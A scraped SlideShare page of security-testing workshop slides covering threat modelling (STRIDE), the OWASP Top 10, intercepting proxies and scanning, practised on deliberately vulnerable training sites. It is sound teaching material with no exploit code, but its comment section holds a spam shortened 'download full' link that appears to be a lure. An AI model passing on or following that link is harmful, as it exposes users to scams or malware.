Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Daniel billing exploring the security testers toolbox

1,640 views

Published on

  • D0WNL0AD FULL ▶ ▶ ▶ ▶ http://1lite.top/zzBl9 ◀ ◀ ◀ ◀
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here

Daniel billing exploring the security testers toolbox

  1. 1. Exploring the Security Testers Toolkit Dan Billing – New Voice Media @thetestdoctor | thetestdoctor.wordpress.com
  2. 2. Objectives for the day  Introductions  An introduction to threat modelling and an activity to generate test ideas  An introduction to the OWASP Top 10  An introduction to some useful tools and how to use them  Explore an application to discover some vulnerabilities  Talk about threats and what they mean in context  Talk about attacks and how they can be used in testing  Practice some attacks  Consolidate and challenge our thinking
  3. 3. Introduction  Tester for 13 years, 4 years as a self employed consultant  Worked in the private and public sector in the UK  AOL Time Warner  Capita  Northgate  UK Government  Brightpearl  Now a Test Engineer at New Voice Media  @TheTestDoctor  www.thetestdoctor.wordpress.com
  4. 4. Introductions About you? What do you want to get out of the day?
  5. 5. A Security Testing Mnemonic  EX – EXPLORE  T – THREATS  E – EXPERIMENT  R – RISKS  M – MONITOR  IN – INTERROGATE  A – ANALYSIS  T – TARGETED  E - EXPEDITED Image courtesy of Andy Glover @cartoontester
  6. 6. Gruyere – the cheesy web app  Navigate your browser of choice to:  http://google-gruyere.appspot.com/start  Built by Google  Deliberately vulnerable web application for training  Don’t enter personal data into it!
  7. 7. AltoroMutual – the reliable banking application  Navigate your browser of choice to:  http://altoromutual.com/  Built by IBM (as a marketing tool for AppScan)  Deliberately vulnerable web application for training  Don’t enter personal data into it!
  8. 8. Explore the application  Work in groups  Explore the application 10-15 mins  What can you find out?  User scenarios?  What can you do with the application?  Critical assets?  Features and functionality?  Areas for testing?  Feedback to the group
  9. 9. Tools of the Trade  Browser tools  Built in DOM tools and consoles – available in all modern browsers  Firebug  Monitor errors, resources, traffic and scripts  Add, delete and modify cookies  Plugins e.g. Tamper Data, EditThisCookie  OWASP Mantra  API tools e.g The Postman, Advanced Rest Client
  10. 10. Tools of the Trade  Proxy tools  Fiddler  Zed Attack Proxy,  BurpSuite Intercepting HTTP/HTTPS traffic Modify requests, headers, cookies and other session data Craft attacks and other harmful scenarios Spider Fuzzers Port Scanning CSRF
  11. 11. Tools of the Trade  Network monitors  Protocol and packet sniffing e.g. Wireshark  Network mapping e.g Nmap  Source Code Analysers  OWASP 02 Platform  OWASP LAPSE
  12. 12. Fiddler  Download and Install Fiddler  http://www.telerik.com/fiddler  Configure your Browser  Set the Proxy Server to 127.0.0.1  Set the Port to 8080  Configure Fiddler  Install certificate if required  Set the Local Proxy to 127.0.0.1  Set the Port to 8080  You may need to close and restart the browser/Fiddler
  13. 13. Zed Attack Proxy (ZAP)  Download and install Zed Attack Proxy  https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project  Configure your Browser  Set the Proxy Server to 127.0.0.1  Set the Port to 8181  Configure Zed Attack Proxy  Install certificate if required  Set the Local Proxy to 127.0.0.1  Set the Port to 8181  You may need to close and restart the browser/ZAP
  14. 14. BurpSuite  Download and Install Burpsuite (Free Edition)  http://portswigger.net/burp/download.html  Configure your Browser  Set the Proxy Server to 127.0.0.1  Set the Port to 8080  Configure Burpsuite  Install certificate if required  Set the Local Proxy to 127.0.0.1  Set the Port to 8282  You may need to close and restart the browser/ZAP
  15. 15. Threat Modelling STRIDE  S – SPOOFING  T – TAMPERING  R – REPUDIATION  I – INFORMATION DISCLOSURE  D – DENIAL OF SERVICE  E – ESCALATION OF PRIVILEGE
  16. 16. Spoofing Threat action aimed to illegally access and use another user's credentials, such as username and password.
  17. 17. Tampering Threat action aimed to maliciously change/modify persistent data, such as persistent data in a database, and the alteration of data in transit between two computers over an open network, such as the Internet.
  18. 18. Repudiation Threat action aimed to perform illegal operations in a system that lacks the ability to trace the prohibited operations.
  19. 19. Information Disclosure Threat action to read a file that one was not granted access to, or to read data in transit.
  20. 20. Denial of Service Threat aimed to deny access to valid users, such as by making a web server temporarily unavailable or unusable.
  21. 21. Escalation of Privilege Threat aimed to gain privileged access to resources for gaining unauthorized access to information or to compromise a system.
  22. 22. Threat Mind Map  Grab some post-its  Identify threats to your application – Gruyere or Altoromutual  How might they happen?  What are the risks?  What might be the impact?  Mind-map them as a team on the board  Feedback to the group
  23. 23. OWASP Top 10 2013  1 – Injection  2 – Broken Authentication and Session Management  3 – Cross Site Scripting (XSS)  4 – Insecure Direct Object References  5 – Security Misconfiguration  6 – Sensitive Data Exposure  7 – Missing Function Level Access Control  8 – Cross Site Request Forgery (CSRF)  9 – Using Components with Known Vulnerabilities  10 – Unvalidated Redirects and Forwards
  24. 24. SQL Injection Exploits of a Mom – www.xkcd.com/327
  25. 25. Cross Site Scripting (XSS) 1. Sends URL containing a hidden script 4. Browser executes script and sends private data 2. Follows URL containing script 3. Serves page containing script 5. Impersonates user at website
  26. 26. Cross Site Request Forgery (CSRF) 1. Victim browses a malicious page with content 2. Script or image executed in browser 3. Attacker can access browser sessions, modify config or send malicious content
  27. 27. Using Scanning Tools  Practice on a training website or on a virtual machine  Agree with stakeholders  Don’t use against a site you don’t have permission to test on  Understand risks to assets  Schedule appropriately
  28. 28. Passive Scanning  Explore the website under test  Observe the behaviour of the scanning tool  What information does it provide?  How is the information structured?  Any testing ideas?  What would you test first?
  29. 29. Spidering  Discovers more areas of your application to test  Physically interacts with the application  Use with caution  What information does it provide?  How is the information structured?  Any testing ideas?
  30. 30. Active Scanning  Performs physical attacks against the application under test  Injection  XSS  Cookie Poisoning  What information does it provide?  How is the information structured?  Any testing ideas?  What do we test next?
  31. 31. Fuzzing  Inputs random, invalid or unexpected data  Might indicate an exception that could cause crashes, performance issues or memory leaks  What information does it provide?  How is the information structured?  Any testing ideas?
  32. 32. Proxy Chaining  All tools work differently  They all have similar but varied features and functions  Linking them together will enhance your testing  Comparison of results from different tools  Try modifying the upstream and downstream proxy settings
  33. 33. Extending your toolset  Can be built into a continuous integration solution  Scripting interfaces e.g. Python, Ruby  API  Reporting
  34. 34. Wrap Up  Is there something we haven’t covered that you want to talk about?  Has this workshop met your expectations?  Any questions?  Thanks for taking part 
  35. 35. Getting in Touch  Twitter @TheTestDoctor  Blog thetestdoctor.wordpress.com  www.newvoicemedia.com

×